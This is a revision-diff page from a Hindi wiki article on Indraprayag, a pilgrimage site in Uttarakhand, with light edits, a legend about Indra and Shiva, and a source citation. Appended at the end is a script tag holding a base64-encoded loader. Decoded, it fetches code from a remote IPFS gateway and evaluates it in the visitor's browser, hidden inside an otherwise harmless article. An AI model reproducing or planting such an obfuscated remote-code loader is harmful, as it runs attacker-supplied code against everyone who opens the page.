Difference between revisions of "इंद्रप्रयाग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
 
*इंद्रप्रयाग [[उत्तराखण्ड]] के [[ऋषिकेश]] से देवप्रयाग जाने वाले मार्ग पर नवालिका-[[गंगा]]-संगम पर स्थित प्राचीन तीर्थ था।  
+
'''इंद्रप्रयाग''' [[उत्तराखण्ड]] के [[ऋषिकेश]] से [[देवप्रयाग]] जाने वाले मार्ग पर नवालिका-[[गंगा]]-संगम पर स्थित [[तीर्थ स्थल|प्राचीन तीर्थ]] था।  
*पौराणिक कथाओं में वर्णित है कि जब देवराज [[इंद्र]] वृत्रासुर से संग्राम में पराजित होकर भागे तो उन्हांने यहीं आकर [[शिव]] की आराधना की थी।  
+
*पौराणिक कथाओं में वर्णित है कि जब [[इंद्र|देवराज इंद्र]] वृत्रासुर से संग्राम में पराजित होकर भागे तो उन्होंने यहीं आकर [[शिव]] की आराधना की थी।  
 
*शिव से वरदान प्राप्त होने पर ही वे वृत्रासुर को मार सके थे।  
 
*शिव से वरदान प्राप्त होने पर ही वे वृत्रासुर को मार सके थे।  
  
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 75| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 +
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
Line 13: Line 16:
 
[[Category:उत्तराखंड]]
 
[[Category:उत्तराखंड]]
 
[[Category:उत्तराखंड के ऐतिहासिक स्थान]]
 
[[Category:उत्तराखंड के ऐतिहासिक स्थान]]
[[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:ऐतिहासिक स्थान कोश]] [[Category:ऐतिहासिक स्थानावली]]
 +
 
 
__INDEX__
 
__INDEX__

Latest revision as of 09:37, 6 May 2018

iandraprayag uttarakhand ke rrishikesh se devaprayag jane vale marg par navalika-ganga-sangam par sthit prachin tirth tha.

  • pauranik kathaoan mean varnit hai ki jab devaraj iandr vritrasur se sangram mean parajit hokar bhage to unhoanne yahian akar shiv ki aradhana ki thi.
  • shiv se varadan prapt hone par hi ve vritrasur ko mar sake the.

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 75| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar



bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>